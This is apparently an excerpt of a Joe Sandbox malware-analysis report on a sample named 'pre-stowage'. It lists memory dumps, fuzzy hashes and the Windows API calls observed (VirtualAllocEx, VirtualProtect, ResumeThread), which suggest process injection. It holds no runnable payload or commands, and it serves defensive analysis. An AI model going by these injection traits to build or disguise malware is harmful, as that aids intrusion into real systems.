                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 2c1f37babcfdb0d0834620a546d9d617b493cceeaaf81458d8f396d289ee53e3
                                                                                                        • Instruction ID: a71f9bc44b7c37247bfc858a3f4cbc888e2deb5803a5610405313a218b8498b7
                                                                                                        • Opcode Fuzzy Hash: 2c1f37babcfdb0d0834620a546d9d617b493cceeaaf81458d8f396d289ee53e3
                                                                                                        • Instruction Fuzzy Hash: 8421E4B5D002089FDB10CFAAD985ADEBBF5FB48310F14801AE918A3350D375A944CFA4
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 094AA056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 639a63c4a60b01dc5e50ed0a83a5fa8b9fabcc9e55410765eb0e862f2f17e276
                                                                                                        • Instruction ID: 63b3c31545fc858cecb6b60f9dbd89a046940bc74c68b8a430b2eeaa83d506a4
                                                                                                        • Opcode Fuzzy Hash: 639a63c4a60b01dc5e50ed0a83a5fa8b9fabcc9e55410765eb0e862f2f17e276
                                                                                                        • Instruction Fuzzy Hash: 0D2124718002499FDB24DFA9C845BEFBBF5EF48310F14841AE919A7250C7759940CFA4
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 0795DA83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: ba5abfc03788954f12f9258884b35e2d0cbcb2314ce8e020d13363351ef4c931
                                                                                                        • Instruction ID: e97b3d011ec4cdff8c57ba89776268e7c871194ee03d7d5d54fce1ccc9b8c8b7
                                                                                                        • Opcode Fuzzy Hash: ba5abfc03788954f12f9258884b35e2d0cbcb2314ce8e020d13363351ef4c931
                                                                                                        • Instruction Fuzzy Hash: 3921F4B5D003599FCB10DF9AD485BDEBBF4EB48320F108429E958A7250D778A945CFA1
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 0795DA83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: 9572c42f94ad7e464135f0f7ab16ba213bb05f664accef5777b8143b847b463d
                                                                                                        • Instruction ID: df343aa1087801d18985bb9823726137ddce79df8bc5b7dbd3c250a91a8d0278
                                                                                                        • Opcode Fuzzy Hash: 9572c42f94ad7e464135f0f7ab16ba213bb05f664accef5777b8143b847b463d
                                                                                                        • Instruction Fuzzy Hash: C02103B5D003499FCB10DF9AC885BDEFBF4EB48320F108429E958A7250D378AA44CFA1
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 094AA056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 658694eda010a9661b71caafd0fbab3728c7e100e51f5ca3b216e5a5baf27662
                                                                                                        • Instruction ID: 7af33c76cbc5bc537d7a21311ac8aac8fac94512f321de769d6fbdfeab064348
                                                                                                        • Opcode Fuzzy Hash: 658694eda010a9661b71caafd0fbab3728c7e100e51f5ca3b216e5a5baf27662
                                                                                                        • Instruction Fuzzy Hash: 3F112671C003499FDB20DFAAC845BEFBBF5EB48324F14841AE919A7250CB769944CFA4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 25972039538b211ae504176718078a8087fd84cbab5863b5e1b5794f7fe56237
                                                                                                        • Instruction ID: d4faff84e513432cc9e7790ab986c58478c92fd10d12ff8ae39b996bf56beb4e
                                                                                                        • Opcode Fuzzy Hash: 25972039538b211ae504176718078a8087fd84cbab5863b5e1b5794f7fe56237
                                                                                                        • Instruction Fuzzy Hash: D7115575D003498FDB20DFAAC4457EEFBF5AF88320F24852AD559A7640CB39A941CFA4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 6c0acb78c8a04145f348ea1971048562eb4128e040e977c6db14ebb91ae67078
                                                                                                        • Instruction ID: ea4e5799abc2eaef201cbb75ae75002703618c9f18c3f9eacc5043ccf2be44da
                                                                                                        • Opcode Fuzzy Hash: 6c0acb78c8a04145f348ea1971048562eb4128e040e977c6db14ebb91ae67078
                                                                                                        • Instruction Fuzzy Hash: CB113675D003498FDB20DFAAC4457AFFBF5EB88320F64842AD519A7240CB79A941CFA4
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 02E2B546
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: e0b465f60803dbef39ce7663c565fed8407f2bcab24cc93b40fcb9a36e66a4c8
                                                                                                        • Instruction ID: 599d6b5eec2846f43fcfec0fa7280d227090c03bbae44f1b467daf750c78ffe1
                                                                                                        • Opcode Fuzzy Hash: e0b465f60803dbef39ce7663c565fed8407f2bcab24cc93b40fcb9a36e66a4c8
                                                                                                        • Instruction Fuzzy Hash: CB11D2B5C002598FDB10DF9AD445B9EFBF9AB48314F10842AD519A7210C379A545CFA5
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 094ACF75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: 219295f14f9259e16a6c536d7722aff68982eab3b3869e4c260611ed086baad1
                                                                                                        • Instruction ID: 4265dcedcf357665a2bcb3e7320c69fc81fef1d75c389b258d87461c423a0f4b
                                                                                                        • Opcode Fuzzy Hash: 219295f14f9259e16a6c536d7722aff68982eab3b3869e4c260611ed086baad1
                                                                                                        • Instruction Fuzzy Hash: F211F2B58043499FDB20DF9AC985BEEBBF8EB58321F10841AE558A7240C375A944CFA1
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 094ACF75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: 3a993e11bb35dca22b0981f64a3778ed9052a1008897e3b05b00b0d0edbdf180
                                                                                                        • Instruction ID: e87bb97e6d807f67d23aa7077f50cee2474dfe9381d305532eab2614f9ef8a97
                                                                                                        • Opcode Fuzzy Hash: 3a993e11bb35dca22b0981f64a3778ed9052a1008897e3b05b00b0d0edbdf180
                                                                                                        • Instruction Fuzzy Hash: 2A11F2B5800349DFDB20CF99D886BEFBBF8EB48314F10841AE559A7650C375A944CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1318590638.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cbd000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 99835def08c2c6621f73bf5a9f519704e0fea5aa7140b7be1384a4ade329c9bc
                                                                                                        • Instruction ID: 917c1c683899e50d450e6f1a38622fd5e4cd8673b612c064fef3ce1d686bf9c4
                                                                                                        • Opcode Fuzzy Hash: 99835def08c2c6621f73bf5a9f519704e0fea5aa7140b7be1384a4ade329c9bc
                                                                                                        • Instruction Fuzzy Hash: 9421F275604304DFDB1ADF14D9C4B56BB65EF84324F24C56DE80E4B296C336D846CA62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1318590638.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cbd000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 86dbacf430098c3bdcd08d769d34aaaf44fe70a5e41763b50369666cf628a16c
                                                                                                        • Instruction ID: 7cdaea817bc45913f8a8a597f701fbc35b797f5b2977548383be88efebbc9933
                                                                                                        • Opcode Fuzzy Hash: 86dbacf430098c3bdcd08d769d34aaaf44fe70a5e41763b50369666cf628a16c
                                                                                                        • Instruction Fuzzy Hash: B621F275A043409FDB06DF10D9C0B66BB65FF88324F24C5ADE84A4B242C336D846CB62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1318590638.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cbd000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                        • Instruction ID: 2d105ce3e0b8ad3ebd742fdba8469a0be81b4aa225323bbb63acb729f3dbecae
                                                                                                        • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                        • Instruction Fuzzy Hash: 44119075904280DFCB06CF54D5C4B55BF61FF84318F24C6ADD84A4B656C33AD94ACB62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1318590638.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cbd000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                        • Instruction ID: c40b0dedf8598f023cb5155044740fb4a5a8b794a064752d641f3c76ce2908da
                                                                                                        • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                        • Instruction Fuzzy Hash: C01179755442809FCB0ACF14D584B55BBA2FB84228F24C6A9D84A4B696C33AE54ACF62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1317644523.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cad000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 87d0263d05af7b64dc2825f2c618ef71d52530c9fc36ca6e26d47fa9324bcd69
                                                                                                        • Instruction ID: b511561fd06b08caeabdd28f9a46562384dc86fe4363464521f27569c7bc308b
                                                                                                        • Opcode Fuzzy Hash: 87d0263d05af7b64dc2825f2c618ef71d52530c9fc36ca6e26d47fa9324bcd69
                                                                                                        • Instruction Fuzzy Hash: 53012B310083449EE7248E16DCC4B66FFD8EF81629F04C029EC4A8E686C3389880CA72
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1317644523.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cad000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f652ebe41dc7b95783e5b4392e80b4e90c88a77fb6e96e54c60e1744b133df4
                                                                                                        • Instruction ID: 3156ef31a0ea71685b0e4f33e251f4ddeb5262cdbb00d5f6f0b70fa9434a01da
                                                                                                        • Opcode Fuzzy Hash: 6f652ebe41dc7b95783e5b4392e80b4e90c88a77fb6e96e54c60e1744b133df4
                                                                                                        • Instruction Fuzzy Hash: 1DF06D71408344AEE7248E16D888B62FFD8EB85639F18C55AED494E686C379AC44CAB1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {#L
                                                                                                        • API String ID: 0-1361971085
                                                                                                        • Opcode ID: beb2b65b64f69a5555b92084f0906b314ccd71ace67eaae09988ca3f6df7fd9a
                                                                                                        • Instruction ID: 89fca736fabbf5778fcd86cf68314ae6dac355b40eec666a812a5c6273d80cdd
                                                                                                        • Opcode Fuzzy Hash: beb2b65b64f69a5555b92084f0906b314ccd71ace67eaae09988ca3f6df7fd9a
                                                                                                        • Instruction Fuzzy Hash: F9D1F5B0E05619DFCB18CFAAD98069EFBF2BF99340F14D52AD419AB224D7349902CF54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {#L
                                                                                                        • API String ID: 0-1361971085
                                                                                                        • Opcode ID: 600c9117abf5a6e575fa8c6d5a32a167f6d2f52bf3d1bc6f93070710ede78855
                                                                                                        • Instruction ID: 6b304ac297e499f823952251f89255ee8608ec59741b20169c5e2624c743f89b
                                                                                                        • Opcode Fuzzy Hash: 600c9117abf5a6e575fa8c6d5a32a167f6d2f52bf3d1bc6f93070710ede78855
                                                                                                        • Instruction Fuzzy Hash: 82D1F5B0E05619DFCB18CFAAD98069EFBF2BF99340F14D52AD419AB224D7349902CF54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TVV
                                                                                                        • API String ID: 0-2552715165
                                                                                                        • Opcode ID: 4dbdf7b4a9638872271b89f36d3f6b25cbe9d81a4c95a41d9d699ab3193e1143
                                                                                                        • Instruction ID: 911835352fd6f5dd46317428dc19e89143806f8dcec6df36f567d262f6e5a40a
                                                                                                        • Opcode Fuzzy Hash: 4dbdf7b4a9638872271b89f36d3f6b25cbe9d81a4c95a41d9d699ab3193e1143
                                                                                                        • Instruction Fuzzy Hash: 12E1D974E006198FDB14DF99C680AAEBBB2FF89305F24C26AE414AB355D7359D41CF60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: L?V
                                                                                                        • API String ID: 0-1250744386
                                                                                                        • Opcode ID: 01ab87480a8ae5c90f098544532668cebc8e4f4a06a31023670e35e1597a785c
                                                                                                        • Instruction ID: 961a40e84d0465870319e997b1c3e0c9cc2dbc58bbb65eaf9ded383594c64156
                                                                                                        • Opcode Fuzzy Hash: 01ab87480a8ae5c90f098544532668cebc8e4f4a06a31023670e35e1597a785c
                                                                                                        • Instruction Fuzzy Hash: 68E1C874E002198FDB24DF99C680AAEBBB2FF49314F24C26AE414AB355D735AD41CF60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @RV
                                                                                                        • API String ID: 0-1079328649
                                                                                                        • Opcode ID: 76f540070ab66ce75d2e8660ba28461b5fe03ee37782fa6464fba6c7d77cf11e
                                                                                                        • Instruction ID: da36cc98d4ac61d856707bc5b1ec8d5ec9a5a325b997912af44d057b15193c14
                                                                                                        • Opcode Fuzzy Hash: 76f540070ab66ce75d2e8660ba28461b5fe03ee37782fa6464fba6c7d77cf11e
                                                                                                        • Instruction Fuzzy Hash: D0E1D974E042198FDB14DF99C680AAEBBB2FF89304F24C26AD414A7355D7359D41CF60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4AV
                                                                                                        • API String ID: 0-3127383403
                                                                                                        • Opcode ID: 515ea108b0a98422fd98e19a1774d5205da1559302a4cd741179ece127815798
                                                                                                        • Instruction ID: 1b1c25ca16c1e3a7677ca16593e34c3d4ad18c5597ddf23dc8b80de7a5d227ba
                                                                                                        • Opcode Fuzzy Hash: 515ea108b0a98422fd98e19a1774d5205da1559302a4cd741179ece127815798
                                                                                                        • Instruction Fuzzy Hash: D4E1E974E002198FDB24DFA9C680AAEBBB2FF89314F24826AD414A7355D735AD41CF60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 98R
                                                                                                        • API String ID: 0-576591972
                                                                                                        • Opcode ID: 1e1379ed98cd9b542687222e3c8fcd1040f84e9444766ef2353503a0dae5a95e
                                                                                                        • Instruction ID: ccd17f39eeaa191b4ed058fd7fea1fe0463b36693752e2cbf9a2b35764139f6d
                                                                                                        • Opcode Fuzzy Hash: 1e1379ed98cd9b542687222e3c8fcd1040f84e9444766ef2353503a0dae5a95e
                                                                                                        • Instruction Fuzzy Hash: 877147B4E1521ADFCB04CFE9E5819AEFBB1FB89310F148469D815AB314D374AA41CF94
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: w7e^
                                                                                                        • API String ID: 0-1657886525
                                                                                                        • Opcode ID: 8d3d984d8e02e1f800ba9fa85e0bdd90b891d4391782b4ec837b1c76fd711b6a
                                                                                                        • Instruction ID: 2027bc90aa5630dfb280cebc8e47f183b0f9fde9508dfa50c2a702a37af29733
                                                                                                        • Opcode Fuzzy Hash: 8d3d984d8e02e1f800ba9fa85e0bdd90b891d4391782b4ec837b1c76fd711b6a
                                                                                                        • Instruction Fuzzy Hash: 045144B4D15269DFCF04CFAAC8409EEFBB1FB8A200F14886AC915BB254D7394602CF58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: w7e^
                                                                                                        • API String ID: 0-1657886525
                                                                                                        • Opcode ID: c33d34c600eed58b073d8368471a1121024faca7c9ff573f2faee2123b1c1d14
                                                                                                        • Instruction ID: 1a897234f7dd015ea3ed87cd116ec6856282d9874bf520776d2a58eda012adab
                                                                                                        • Opcode Fuzzy Hash: c33d34c600eed58b073d8368471a1121024faca7c9ff573f2faee2123b1c1d14
                                                                                                        • Instruction Fuzzy Hash: 3A4127B4D15269DFCF04CFA6C9405EEFBB1FB8A200F14982AC915BB254D7794642CF58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0ni
                                                                                                        • API String ID: 0-1488673370
                                                                                                        • Opcode ID: cc1c5441fbf192b6330d091637618392a9f8bd94d00019f4bf952c6e5f78b5bb
                                                                                                        • Instruction ID: 38ecbd8fda17d4c6e824bb3833694564ef2c65d6710b5166bb00a290bdb557a4
                                                                                                        • Opcode Fuzzy Hash: cc1c5441fbf192b6330d091637618392a9f8bd94d00019f4bf952c6e5f78b5bb
                                                                                                        • Instruction Fuzzy Hash: FF517EB1E046188BDB28CF6BD94579EFBF7AFC8301F14C1BA850CA6254EB3409858F51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e259a51f62d3d23bbf66b5cf9a636554b6d26021805c22d5b377713dc132549c
                                                                                                        • Instruction ID: 7e8cf95d3b9e8207bb6cf3caaa179c605e4d9ae1ecf4e89a68871922c8396981
                                                                                                        • Opcode Fuzzy Hash: e259a51f62d3d23bbf66b5cf9a636554b6d26021805c22d5b377713dc132549c
                                                                                                        • Instruction Fuzzy Hash: EDE1DA74E002198FDB24DFA9C6809AEBBB2FF49314F24C26AD414A7355D7359D41CF60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 42c87d7729a573628e52c6f01bd40710ea1f52d4c3e9f31118cd0e0c109e606b
                                                                                                        • Instruction ID: 9aa4973b1a2c073868daddc68ed627af9b6039e4ae45ed55c1d9fa0f3b2b35b3
                                                                                                        • Opcode Fuzzy Hash: 42c87d7729a573628e52c6f01bd40710ea1f52d4c3e9f31118cd0e0c109e606b
                                                                                                        • Instruction Fuzzy Hash: ABA17F32E402298FCF19DFB4C84459EB7B2FF85304B15957AE806AB261DB31E919CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4c933a4c00dfca480b86dfd35cffb446b147f790a1286399a8507ad0e6c9b0b5
                                                                                                        • Instruction ID: 7ac8fe37fbaf89ebc58bf3cabbc3b5893434af2e535337e0f491c48bdafd0b5a
                                                                                                        • Opcode Fuzzy Hash: 4c933a4c00dfca480b86dfd35cffb446b147f790a1286399a8507ad0e6c9b0b5
                                                                                                        • Instruction Fuzzy Hash: A491E2B4A1521ACFDB04CFA9C58489EFBF1FF89224F249559D419BB220D334AA41CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5a71ae6e7c074812d803c01f214dd615c9e5c7ac91b638fbbaf6141e8ab4a56c
                                                                                                        • Instruction ID: 8267800aee99f4dac046de77373a1b5f1ec5a41ee09fcdc691b378e63a92a394
                                                                                                        • Opcode Fuzzy Hash: 5a71ae6e7c074812d803c01f214dd615c9e5c7ac91b638fbbaf6141e8ab4a56c
                                                                                                        • Instruction Fuzzy Hash: A781F3B4A1521ACFDB04CFA9C58499EFBF1FF89324F24956AD419AB320D334AA41CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0349df74a1c3003362be964221ff5c6d2dd731cf94a01f88ba5b08930a4e3bd1
                                                                                                        • Instruction ID: b99a0b4729f0c20c3cc3f50496648173334e9e89eb330527868ea01e63638e24
                                                                                                        • Opcode Fuzzy Hash: 0349df74a1c3003362be964221ff5c6d2dd731cf94a01f88ba5b08930a4e3bd1
                                                                                                        • Instruction Fuzzy Hash: A2814BB5D102298BDB14CF69C680AAEFBB6FF89304F24C169D808A7345D7319E41CF61
                                                                                                        Memory Dump Source
